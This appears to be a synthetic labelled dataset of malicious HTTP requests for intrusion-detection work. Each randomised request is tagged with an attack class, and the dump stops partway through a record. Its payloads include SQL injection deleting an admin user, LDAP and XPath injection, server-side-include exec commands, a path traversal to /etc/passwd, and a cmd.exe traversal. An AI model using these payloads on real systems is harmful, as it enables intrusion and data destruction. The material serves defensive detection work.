Content-Type: application/x-www-form-urlencoded
Host: www.eoAseTic.uk
Connection: keep-alive
Accept-Charset: *
Accept-Encoding: identity;q=0.9, gzip;q=0.0
Accept-Language: py-ristec78;q=0.0, o-cllS;q=0.3, dHaejnaa-iap;q=0.5, etwxvan-k
Cache-Control: max-age=493
Client-ip: 185.216.191.13
Cookie: r3gecytsu5xias9=0658;wsi9ciaNihai=doc(file:///c:/mF/seabe.xml    );uFNuncI-x7bl_=c6oegrt
Date: Wed, 01 Mar 06 17:04:42 GMT
ETag: W/"P8IDiVo4tUUrwMTE"
Expect: mo0r
If-Modified-Since: Mon, 11 Dec 06 07:00:32 CET
If-Unmodified-Since: Wed, 16 Sep 09 24:18:10 GMT
If-Match: *
If-Range: "8UQW2CVLwLVYpwl_.Fo"
Referer: http://awtE.biz/Sa1rih/6dn0nl9/4aaenkyo/nECwasme/BerFsenf.cgi
TE: deflate
User-Agent: t2ln0ldix (h_qdMYq)
Via: FTP/1.9 www.on2me.css, 6.8 www.Swntlue.gif:460, 2.7 www.nd71thlj.shtml

nskwson=idtt&cp8=8N89O&Cdivinserth=979635&ein9refmor=ertseee3fAnhtjezhp&YlinkA5ko9iUhi=1414&eny=1934701271&ex6d9imuStrexxc=4&9tqolotn8rlepo=tieygroup by%i&riRyvs=oformae bHl&nAOPWwqrj2A=idj3Ah4dh7teo&ecrhInhE=9063354&mr71mfteiWl6i=s&2aehtpass=ofysAhLxCRI

End - Id: 45044
Start - Id: 37537
class: LdapInjection
POST /xoiy0apsZtaht6r/locationhRJ094/nibNeieeSOosoiItr/tlSU596/BKnw5GV8wu3Uo/rtaxpolyot/cdMZijj0LGah/Dq_llinki.vt.httpau.dll? HTTP/1.1
Content-Length: 251
Content-Language: fdo0Ter,0aal7kt,gstir
Content-Encoding: identity
Content-Location: /pedxeedh/ueEhj/aoqh.php
Content-MD5: TmFIZEExdEl4eGhoY2s3Mw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 07 Oct 04 07:17:32 UTC
Last-Modified: Tue, 23 Oct 07 10:56:24 GMT
Host: 179.16.44.181:91305
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9, isiri-3342;q=0.0, windows-1250, iso-8859-4;q=0.5
Accept-Encoding: deflate;q=0.3, gzip;q=0.4, deflate, compress, compress;q=0.3
Accept-Language: nre-aueouo;q=0.7, theet-qeft7e
Cache-Control: max-stale
Client-ip: 133.128.23.213
Cookie: qNi_LslQinwinnte=?10;bosndNetiaetu=|hb;ZexbSYTautoexecQ.=mVZ5rjCUn;cumvs80av=oQYczt-;NlLMelathhru=tqhctDhclunh
Cookie2: $Version="02"
Date: Wed, 09 Jul 08 12:02:56 CET
ETag: "cvwP9_XN-CuZEemWyx2y"
Expect: 5scdi=bsklE1e;ireeen
From: nIt1h@rvrs.org
If-Modified-Since: Sun, 06 Apr 08 18:27:07 GMT
If-Unmodified-Since: Tue, 08 Jun 04 23:19:38 GMT
If-Match: *
If-None-Match: "o@X5y-IYqeEBjommG"
If-Range: Sat, 11 Aug 07 18:52:56 CET
Max-Forwards: 6
MIME-Version: 9.7
Pragma: aisGoeti='h'
Proxy-Authorization: rertml hneO5=eocht
Authorization: edssen gudohr1a=luooomT
Range: 0516-7855,069180-,334-
Referer: /edsAr3wo/ahtter/faagnO.tar.gz
TE: chunked
Trailer: TE
User-Agent: 4htiWDrycxnc1tmq
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
Via: 2.4 www.ptbmt.png, 6.3 155.152.28.231, HTTP/2.4 www.Uuc2eat.htm
Transfer-Encoding: deflate
Upgrade: uTzmh/1.6, onhq/1.4, ecsat6/1.2, etDno/7.8
Warning: 162 www.befnhlc.css "osea53nrTepho" 
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~

ufi=tBonbaajjeho&ihndOrlE78eie9=cwgetitbun&nErenRdmnirIt=t0Ryh1Y.zATq&ct=8896598303&Tptec=n@deletene8i5ar'ho<a&kneointpkna=metaa8o&OPgzrHP1.Eihome=75)(&(objectClass=lool)(|(sn  = f4)(cn=1T  J*))&h0vHei=38198&pie=939

End - Id: 37537
Start - Id: 40246
class: SSI
POST /jrkr/oxOMx/iBtV7QrJrf/aCtx7eWrq.bUwiU_x/90-v@8WRq/sgYJUk.N./tmV3DZhYzhfhIfj0I6y_/e4/uL5Z2TxvEV1K5B8l/fdcoaiirmtea87h/n.pzuNfksSxKACLu.cgi? HTTP/1.1
Content-Length: 375
Content-Language: jywiEeno,aamuoh,ns
Content-Encoding: gzip
Content-Location: http://9owia.de/szrf/de2roi/bgh9oaae.php3
Content-MD5: bjhwNDJzdjFBZTlzYWhpdA==
Content-Type: application/x-www-form-urlencoded
Host: www.nmnae.be:445
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: mmean-odsnasi
Cache-Control: no-cache
Date: Tue, 27 Mar 07 19:08:45 UTC
From: YHtcdN@wRae.uk
If-Modified-Since: Tue, 29 Nov 05 13:06:39 UTC
If-Unmodified-Since: Sat, 11 Feb 06 06:51:18 GMT
If-Match: *
If-Range: Tue, 09 Feb 10 08:34:11 GMT
Max-Forwards: 655
Pragma: no-cache
Referer: http://www.Nqbesen.be/TnTAi/eneotzot.png
TE: trailers,trailers,trailers
User-Agent: aknbpee/3.4.8.0
Via: 8.5 143.212.41.118:8, HTTP/9.8 www.Gcr0evne.htm, HTTP/9.7 www.eka4.gif

4ZR6wqa0L=6connectinputh&ireuhabaMstmogr=td9sh&acceptbgsoundeC@iy=8434&ogd2gt=dsegjgsrae&eod=kehc&uiaasr5onybckt=967&dymlvmn=0&xe=se6&tvijb7=q4ofieetjiuxb&iFnooj97eue=<!--   #exec  cmd="c:\progra~1\UNiuttFl\isE0ext\A3a.exe    d:\nrTai\www.aselli.org\nTett2e5s6\database.mdb   /x  exporttofoxpro"-->&s9pgyiu=145458&ibi6aeessd=lYN&tei=z9Xq

End - Id: 40246
Start - Id: 41890
class: SqlInjection
GET /eemhphseawrwnderirs/oltniuDprat3tLirn2i/icOo8AUiV41ID8BdDP/w2WVrhgolKqOm/zKa6oATyDm_T/e@9vo/weKpng6VsRBhtpassi.asp?Ea=137&skIno1n7tsr5=0neegavary1dcntbiha+connecto&iG=sN2Esontdo%27+++%29%3B++++DELETE+++++FROM++users+WHERE++upper%28username%29++%3D++++upper%28%27admin&6hIiohdwtonh8af=tm&smoafuoeumbgx=51702 HTTP/1.0
Host: www.5tieew.net
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.1
Cache-Control: s='eaae'
Client-ip: 143.204.36.23
Cookie: gnavser5=rR;GIUe=4951;ncti8zltb=t;Cerro8=sosTs7sx:jn7qro0a4
Cookie2: $Version="03"
Date: Sat, 30 Dec 06 07:59:09 UTC
ETag: "gPXWXCyV9O4k_0w1BPB"
Expect: tRes=eraidrt;9eka
From: elee@hieitj.de
If-Modified-Since: Wed, 17 May 06 15:55:06 CET
If-Unmodified-Since: Wed, 30 Jul 08 07:56:49 UTC
If-Match: *
If-None-Match: *
If-Range: "6lQE19nNJXDcMx4mQDM0"
Max-Forwards: 1565
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: itfq bn7bnxr=jeUlmesd
Authorization: NTLM bXNlYnNwYWZvZXRhZnN6bmE1RW9IcmNEZGlvdG9sSGRhb2VpbXNoYWFFdG5zNzJ0
Range: 2764-93323,17883-91
Referer: http://ttsd.org/aioaDi/rO6mw6l/pig3ed1/aeaF/zflu.php3
TE: chunked;q=0.5
Trailer: Cache-Control
User-Agent: Mozilla/0.6 (Machintosh; U; PPC 4.6; aa-tw; rv:2.4.2) Gecko/18380364
UA-CPU: PowerPC
UA-Disp: 421,960,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 044x365
Via: tnehuh/2.7 196.108.75.78, 1.1 136.112.104.179
Transfer-Encoding: nnesi; DotE=wOsnmq
Upgrade: 9sH/0.7, h7C/7.3, a0w3h/0.4
Warning: 181 www.e4hach.tiff:99487 "eyten3eElsgEginsaoi" "Sun, 29 Feb 04 08:39:55 UTC"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41890
Start - Id: 46050
class: PathTransversal
GET /ed6f9n5e8wtt/nlPdq/olHc/eLigjlrE2neFrx8Emnpd/yRsr7hirrnmiEEtcufe/nChcN7py2e8k0/O./ti/oihL/iWm9WOL/hu.html? HTTP/1.1
Host: www.ijeawcr8h.org
Connection: ara1w
Accept: text/html, video/*;q=0.7, application/rtf
Accept-Charset: *;q=0.3
Accept-Encoding: identity, gzip
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 252.1.75.0
Cookie: bteRhtlfitlrepH=2SOe|';otluSOlllLs=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html;8chnHiyitnftoet=slp;7hf8uN6nrwosas=elmnnachp;emncj=648056
Cookie2: $Version="45"
Date: Sat, 11 Dec 04 11:12:53 GMT
ETag: "bhrBinUpFaHTGfqr"
Expect: 2lhr0=hnrA;dnlnid4=ymEe
From: noioi@Hnopfds.gov
If-Modified-Since: Sun, 07 Mar 04 23:57:34 CET
If-Unmodified-Since: Sun, 16 Apr 06 10:03:47 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 22 Dec 08 08:51:55 CET
Max-Forwards: 83
Pragma: Uryt34n=miieAa
Authorization: Digest algorithm=MD5-sess
Referer: /uiftt.avi
TE: chunked,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/8.4 (Windows; U; Windows NT 0.3; lp-sm; rv:7.8.1) Gecko/54541971
UA-Disp: 478,2158,8
UA-OS: Solaris
UA-Color: color32
Via: lw8sq/3.6 6.216.231.105, HTTP/4.8 www.im2oh.jpg
Upgrade: domfsc/6.5, zfo9/7.9
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46050
Start - Id: 40291
class: SSI
GET /llie5YhSfhotiiia/gE8divEZ@xp_/ed64/eeeEagt7dvIid/E9ne/Thtacces/eNyykY/rG-3var6Q/eBRy2Rl3lrlP17IOXz.gif?oaajsdaeajriaep=bwLf1_vQK&udasc3Tii8et=a2+egcc%28z%40k&8FhG=%3C%21--+%23exec++cmd%3D%22c%3A%5Cprogra%7E1%5C0ss%5Cips1%5CnBti.exe+d%3A%5CnAEoh%5Cwww.setielri.org%5Cecesar5%5Cdatabase.mdb+++++%2Fx+++exporttofoxpro%22--%3E&iqiiiwjsatar=b%27tz&sueobtef=aea+ HTTP/1.1
Host: 214.71.5.224
Connection: close
Accept: text/*, audio/x-wav
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: 3cffee2N-e0rt;q=0.7
Cache-Control: only-if-cached
Client-ip: 233.182.232.153
Cookie: leeisrU4a=bMw8-5r1u2_;adfdhv6M=~ser@;psst=dyJ2wiIA;hcdheAHneqtNzi5=teglo3f4i;thp9th=nebin4boot.inifZAkm'j;rnsbva=hhl2sgrzexeoki
Cookie2: $Version="394"
Date: Sun, 11 Jan 09 07:37:00 CET
ETag: W/"cZahXkYy1L59OAb"
Expect: ltnpse
From: sinl@n3biht.ch
If-Modified-Since: Wed, 26 Dec 07 10:06:37 UTC
If-Unmodified-Since: Fri, 06 Jul 07 11:48:26 UTC
If-Match: "ChbBg84reec1gBQ5Htl"
If-None-Match: "5BC@s8Xh_xvT25ly"
If-Range: "PHyY9dc1tgh1y@K"
Max-Forwards: 3591
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: oeos goaweqW=tqMehbrx
Authorization: Digest uri=/enaal4i/2shfn/bVreRy/hizeee/hehahtqL.tar.gz
Range: 37574-,839789-
Referer: http://www.iecw.be/Kiyyh/odr9lljW/Zjhndl/ysrOm.zip
TE: trailers
Trailer: Connection
User-Agent: telt8eze (n0m_2As6I; 68_98.E; 2E82HU; isDjJO7Jh; d2@ApU)
UA-CPU: MIPS
UA-Disp: 2515,7751,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2184x777
Via: 4.1 www.te1aciqr.jpg:36661, 6.5 118.17.15.185:35, FTP/8.4 30.74.40.227:8409
Transfer-Encoding: compress
Upgrade: rdr/9.6
Warning: 559 www.x4kdcw.js "6b1la22lnngto" 
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 62707296438769057176
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40291
Start - Id: 36489
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 147.122.105.6
Connection: ePFi
Accept: */*
Accept-Charset: x-mac-arabic;q=0.8, iso-8859-8;q=0.3, iso-8859-7, x-mac-chinesetrad, windows-1252;q=0.3
Accept-Encoding: gzip, identity, deflate
Accept-Language: y7tp-ctVEtjto, oitltim-eeos;q=0.2, fubohIs-h;q=0.1, snib0tB-o
Cache-Control: no-cache
Client-ip: 219.137.139.146
Cookie: flEA=hlib1se;tawiteenmei=iomh
Cookie2: $Version="984"
Date: Fri, 06 Feb 04 06:40:10 UTC
ETag: "EEjfH1qoZefe@m2kmR"
Expect: tseaeeai
From: n8us@72HjX.ch
If-Modified-Since: Sun, 26 Sep 04 13:52:36 GMT
If-Unmodified-Since: Wed, 26 Jul 06 01:18:34 GMT
If-Match: "8NqOGhZtd.10osrYsCUi"
If-None-Match: *
If-Range: Thu, 17 Aug 06 17:47:41 UTC
Max-Forwards: 615
MIME-Version: 9.8
Pragma: k='Yat'
Proxy-Authorization: iuqrt iwRdnnb=pgerxsn
Authorization: NTLM YXZ2NmcxYTE0aHJodG9vZWxlcGFoamk2aG5kYU9uaXVjZUdhM3dVaG5ucml5Yw==
Range: 998505-,-0540,815-
Referer: /IoFlSm/s2dezfAd/ACte8H/xOao6P.pdf
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.8 (Machintosh; U; PPC 8.6; t7-da; rv:3.3.0) Gecko/18963936
UA-CPU: MIPS
UA-Disp: 900,140,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 512x1298
Via: FTP/1.6 www.eeahm8my.htm
Transfer-Encoding: oeEjm
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36489
Start - Id: 41924
class: SqlInjection
GET /gPXM/ewohtnizqw.png?-blmVq=cii0et29tmso&Eu=kvZ5Kb_&htfoiiaooor=15417&3t=840573&ua=oi%3Aoa&@g_v=d9e&dh2tyjoo=%27+%29++UNION+++ALL++SELECT++++38++++FROM+++ts2mon++WHERE+++++%28%27%27++++%3D++++%27&xbml8b=t5eir1f5Abei HTTP/1.0
Host: www.9iiefxm.cz
Connection: apdefouc
Accept: application/*;q=0.4, text/xml;q=0.7, image/gif
Accept-Charset: iso-8859-8;q=0.8, iso-8859-8-i;q=0.2, iso-8859-8, utf-8, utf-8;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 21.123.50.241
Cookie: aad3nthtt=lvdhadfesana;saudbegculs7dSk=3mmawm
Cookie2: $Version="26"
Date: Mon, 13 Apr 09 14:12:17 CET
ETag: "o4V4NB.J9gXaYf8twh"
Expect: ywWtykim
From: usDda@iceeiIo.gov
If-Modified-Since: Fri, 20 Jul 07 15:35:46 GMT
If-Unmodified-Since: Wed, 27 Jul 05 06:35:45 GMT
If-Match: "jzg.4KCCUmx9aRaI@2z3"
If-None-Match: *
If-Range: Sat, 18 Apr 09 13:12:21 UTC
Max-Forwards: 5983
MIME-Version: 9.6
Pragma: Tertaen='tE'
Proxy-Authorization: Digest realm
Authorization: Digest qop=auth
Range: -0
Referer: /0sne/56deAc/eouh.pdf
TE: deflate;q=0.9,trailers,chunked;q=0.7
Trailer: If-Range
User-Agent: hesSurrAt3 (mc7LgoZLK; 8BUmWN.0; a.l-Wg; ehZD@O; tuKMKF)
UA-CPU: 68000
UA-Disp: 421,960,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9010x724
Via: s7io/9.4 www.dtdB.htm, 5.6 102.96.130.189, 9.9 www.rtRh.jpg
Transfer-Encoding: eoA7
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 941 www.opH3rr.tiff "cssrqn2d5ar9lsne3" "Mon, 23 May 05 22:26:08 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41924
Start - Id: 35687
class: XPathInjection
GET /o0t/iIof_Sytc/h5@AcLgaCQAM.js?orstoaiceDp=215&jkwCorHah17py1=iotelnety%2Byba%3Apoty&HA@A=y-trdampncinputgrcp&seordn=2&dtlse=89680&pIcmxQieew=r-oCM5Xfz5&onfOahtoeloschl=3&agiCsr5wsy=11244++or+++++6%2FhjCai%2Faeetx%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D409%5D++++or+9%3D HTTP/1.1
Host: 132.202.112.59:80
Connection: close
Accept: image/png
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: Vy-nB, aehdl-aoew;q=0.1
Cache-Control: no-cache
Client-ip: 50.131.48.51
Cookie: c318ahue5Fz=252669622
Cookie2: $Version="3"
Date: Fri, 04 Jan 08 01:51:19 CET
ETag: W/"k1U73-zB@DVFTOX"
Expect: dOaiscoo
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Sun, 17 Aug 08 24:21:45 CET
If-Unmodified-Since: Fri, 24 Oct 08 15:34:45 CET
If-Match: "g0sCcnngA3IsBVjeYRN"
If-None-Match: *
If-Range: Sun, 19 Jun 05 02:17:13 GMT
Max-Forwards: 8539
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: NTLM Nm9LZW05b2hud3NldTBzbWxlbnplYWVidEYyZGVXQWRkbmlsb1Vua2xuMHNybnRl
Authorization: onlo kocbiisi=iNbo9ksy
Range: -82,-22
Referer: http://www.0dislxe.cz/6lo7hho/4aliel/hcd1pcia/midefaI.bin
TE: deflate;q=0.2,chunked;q=0.4
Trailer: Accept-Charset
User-Agent: Mozilla/0.5 (compatible; MSIE 4.5; Open BSD i586; 6G5xridt; eaXea3bu)
UA-CPU: PowerPC
UA-Disp: 165,7015,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 656x763
Via: 6.5 6.212.132.174
Transfer-Encoding: albn; mniyi=enrne
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 727389738621693748
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35687
Start - Id: 35718
class: XPathInjection
GET /o4IGiTfz7EtHyWd4/shutdownUCJpRaNZo2.asp?otonadehd74hs=t+4eeiinsert+7&CqRFHw=83461384&Sqcpsam=86900&TQuD00rmSB=40891++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or++06724%3D&pimleolsiteu=in HTTP/1.0
Host: www.enwJb.fr
Connection: Cdxsub0d
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.6, gzip, deflate;q=0.4, identity
Accept-Language: ehow7in-ee2e;q=0.3, u-4yt;q=0.8, ewap-ra;q=0.9
Cache-Control: max-stale=87
Client-ip: 77.125.12.174
Cookie: suctdehsisY=9o= 
Cookie2: $Version="9"
Date: Sat, 17 Apr 04 18:36:01 CET
ETag: W/"mZF-ns0Ok3629vIwy"
Expect: 100-continue
From: p1tia@Pqapltwu.it
If-Modified-Since: Wed, 08 Apr 09 03:58:16 UTC
If-Unmodified-Since: Sat, 18 Apr 09 09:39:41 CET
If-Match: "T7VzaxZ3Rq7iptWn"
If-None-Match: "6T.17L64ixue@dU4Tud"
If-Range: Sun, 01 Feb 09 04:20:41 UTC
Max-Forwards: 34
MIME-Version: 8.0
Pragma: noDSneiR=en
Proxy-Authorization: Basic ZXllYTc6dHNuMA==
Authorization: NTLM aXg5bm5mbmVyc2hlOWV3aGh0bDI2YmNPaWJ1ZW9ycHlybmUybmVoaWhlbm9oYQ==
Range: 5225-,8-9,1-
Referer: http://zifsg.fr/uhe9h5s/c3sedt.gif
TE: chunked;q=0.9,chunked
Trailer: TE
User-Agent: etanmjeL3t (sBqIcz_)
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 161x6887
Via: HTTP/5.9 www.0rwrNh.jpg:7, yude/2.0 10.38.47.102:78
Transfer-Encoding: deflate
Upgrade: d3ec/2.6, tifat/9.6
Warning: 550 www.hfiueaes.shtml "mhtjtnssennQ8" "Fri, 14 Nov 08 07:02:27 UTC"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35718
Start - Id: 48965
class: XPathInjection
GET /TaSie5taxtsa9rvnfcyk/olPOEdqVca0u7isEJ6_/rhiswmzelekcNltoihi/ng/jeO5mtC.png?rnbp=54&caeeatSan0iar=rajarwd&e2mnlnhrr=eaeextt1rcmotifs&rhrte=16875103&GQJH5=sa3JiztgE%288rr&xrenr=8376&xPTrT6iU0=leeu%27+or+b%2FEoi%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D516%5D++or+++%27thrht6ft%27+++%3D++++%27&cm7KAmFfWoptyiframe=14535061&csosw8Tw7=t-iaea%3Ft91Nh%2B&isdugw6ihrcer=vio&1anrtie6xhoeala=382200 HTTP/1.0
Host: 1.47.206.119:80
Connection: keep-alive
Accept: */*
Accept-Charset: koi8
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=01175
Client-ip: 196.26.247.32
Cookie: _0aLRL219=tMi-2DVCVjv.;da=objectetds;eihcont=54JsDqRZUocG;-@passthrus9s=6
Cookie2: $Version="98"
Date: Fri, 16 Jan 04 02:07:03 CET
ETag: "FUkp6cY6gug6IFvU"
Expect: 100-continue
From: aaee5oT@0lekntq.de
If-Modified-Since: Sat, 15 Dec 07 17:00:37 CET
If-Unmodified-Since: Sat, 24 Jul 04 13:31:26 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 899
MIME-Version: 6.3
Pragma: 8sqe=13nrb
Proxy-Authorization: 7ryrer l7Fsei=9ums
Authorization: 0igehl tnRi=lsneia
Range: 23-,057-,45-
Referer: http://s8dj8ma.it/Fir2.mspx
TE: deflate,chunked;q=0.2
Trailer: Accept-Encoding
User-Agent: Mozilla/6.8 (X11; U; Linux i586 3.5; 1s-es; rv:5.0.8) Gecko/42191914
UA-CPU: 68000
UA-Disp: 7135,390,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7333x919
Via: HTTP/9.0 www.h7ai.gif, FTP/1.5 163.123.25.161
Transfer-Encoding: topOi
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 932 www.wwas6l.css "3kbciaaakjefi5ciec" "Tue, 30 May 06 18:44:25 CET"
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 48965
Start - Id: 41248
class: SqlInjection
GET /gR.aspx? HTTP/1.1
Host: www.xaigpaoans.cz
Connection: keep-alive
Accept: video/*;q=0.5
Accept-Charset: x-mac-hebrew;q=0.7, iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: '    or    id     in   ( select    *     from    user_db  )
Cache-Control: max-age=344
Client-ip: 156.64.250.125
Cookie: et1aeDs=8nkdqamf;qf.x4.E=ha]ea;iee;lorg=2eosWncN;hel=2459;Ncat6adminusrpasswds=tmps
Cookie2: $Version="05"
Date: Sun, 24 Feb 08 22:32:28 CET
ETag: "XWNd4B-nPNQorcC"
Expect: auPvos
From: YipHgse@Wh0aus.de
If-Modified-Since: Fri, 26 May 06 13:55:29 CET
If-Unmodified-Since: Fri, 21 Jul 06 19:29:02 UTC
If-Match: "dDkviAB7vacA@7Np"
If-None-Match: "9ot@EsXAGipBvI@F"
If-Range: Fri, 31 Mar 06 09:07:26 GMT
Max-Forwards: 59
MIME-Version: 4.7
Pragma: d='Ioemim'
Proxy-Authorization: Digest nc=Bba58bDA
Authorization: Basic aUlnRWF1OmltZFhpZg==
Range: 377941-4452
Referer: http://tanspre.gov/tmteI3d/RatroN2/vewocu.nsf
TE: trailers,trailers,chunked;q=0.4
Trailer: Warning
User-Agent: t1Bcje.42 http://www.j8aot.de
UA-CPU: 68000
UA-Disp: 9585,9750,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 921x845
Via: 5.4 2.32.141.59, 7.6 136.67.91.118:3, FTP/2.0 www.m6Npe.gif
Transfer-Encoding: compress
Upgrade: tno/0.7, leolp/4.5, ixwe/8.3
Warning: 092 www.sRueG.htm:35899 "atSmsu2feBlep0ass3" "Fri, 30 Jun 06 18:47:30 CET"
X-Forwarded-For: 119.121.155.105
X-Serial-Number: 48880057053
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41248
Start - Id: 39180
class: SSI
PUT /lk2GL.zc@_jQ/uQLtnMiXLtu80m0N8o.css? HTTP/1.1
Content-Length: 223
Content-Language: dR,EiaUDl
Content-Encoding: gzip
Content-Location: /hhrgre/e0en/rRaH9baR/newecrgb.msf
Content-MD5: YkN1cmxhb2lkb2lzc2Vybw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Nov 05 22:51:56 UTC
Last-Modified: Thu, 02 Jul 09 18:22:50 UTC
Host: 177.221.149.124:639
Connection: ae9gah
Accept: */*
Accept-Charset: windows-1250
Accept-Encoding: gzip, identity, identity
Accept-Language: trre-rraiamnd;q=0.1, on-dnor, aecwbo-yti5lgn, nehz1v-ohoen;q=0.1
Cache-Control: only-if-cached
Client-ip: 235.165.190.162
Cookie: eeuxehthnifl=hIfskhgn;idGHoUeU=stSahtaccesYchreplacent;5B11.=ema
Cookie2: $Version="261"
Date: Sun, 07 Oct 07 11:38:14 UTC
ETag: W/"531dopOQUGTzEYYmsZ"
Expect: s2C5
If-Modified-Since: Sun, 27 Jan 08 07:38:27 GMT
If-Unmodified-Since: Sun, 28 Feb 10 01:04:55 CET
If-Match: "gKywMdRB3_fba5@"
If-None-Match: "XIytUbg@i4Zek9twT_h"
If-Range: Sat, 12 Aug 06 12:33:44 CET
Max-Forwards: 7
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic cnNlaW9yOjFzc2U=
Authorization: Basic ZUlySURkaTpzYXNvbQ==
Range: -6803,-23
Referer: http://eizA8lfr.be/wnnmn/EhNeirao/Ttoept.nsf
TE: trailers,trailers
Trailer: From
User-Agent: rImNHP http://www.wuthUyas.fr
UA-Disp: 631,569,16
UA-Color: color8
UA-Pixels: 466x9263
Via: FTP/6.2 www.eouus9nb.png, Eagc/6.2 71.228.144.120:29, FTP/8.0 102.112.204.211
Transfer-Encoding: gzip
Upgrade: obsrun/6.2, Knhh/3.4, neecd/0.5, ttn/3.3
Warning: 671 www.sNedft4.tiff "aEHyset" "Wed, 16 Apr 08 21:11:39 CET"
X-Serial-Number: 2274804334681
~~~~~: ~~~~~~~~~~

pinirTihp= > eea&Trhme=puoy9P948s&iapoag2lo=fGtbl2HB9r7&eAieh5ceeet=37894286&so=rrto6b3Urmlist hdq&2smino8t1sciXs=381555&hibboaqEin0odae=<!--  #exec    cgi="/cgi-bin/script?ea"  -->&rrdrrDiaehe=8612865

End - Id: 39180
Start - Id: 37538
class: LdapInjection
POST /Egshekemh/ur8-giupositionNAsjUJwindow.open/eOiles8s4/gialoitoOd/hsoos8re/iwytlskoe2cnhdrL/Rbhaving1s83GGV/i./e8pjFmKNUgC14oXUvH-/oV.cfm? HTTP/1.0
Content-Length: 32
Content-Language: jTiE,n
Content-Encoding: gzip
Content-Location: /sablsp/ndto2n/aoeaa5.asmx
Content-MD5: SXRlb2NyZ2ZjbERzZHBzaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Oct 07 19:40:03 CET
Last-Modified: Tue, 23 Oct 07 10:56:24 GMT
Host: 245.101.204.196
Connection: maeau
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate;q=0.3, gzip;q=0.4, deflate, compress, compress;q=0.3
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 10.34.107.160
Cookie: qNi_LslQinwinnte=?10;bosndNetiaetu=|hb;ZexbSYTautoexecQ.=mVZ5rjCUn;cumvs80av=oQYczt-;NlLMelathhru=tqhctDhclunh
Cookie2: $Version="02"
Date: Thu, 16 Oct 08 22:15:52 GMT
ETag: "cvwP9_XN-CuZEemWyx2y"
Expect: 100-continue
From: nIt1h@rvrs.org
If-Modified-Since: Sun, 06 Apr 08 18:27:07 GMT
If-Unmodified-Since: Tue, 08 Jun 04 23:19:38 GMT
If-Match: *
If-None-Match: "0js1S6QGMgvCTJRH"
If-Range: *
Max-Forwards: 3848
MIME-Version: 9.7
Pragma: no-cache
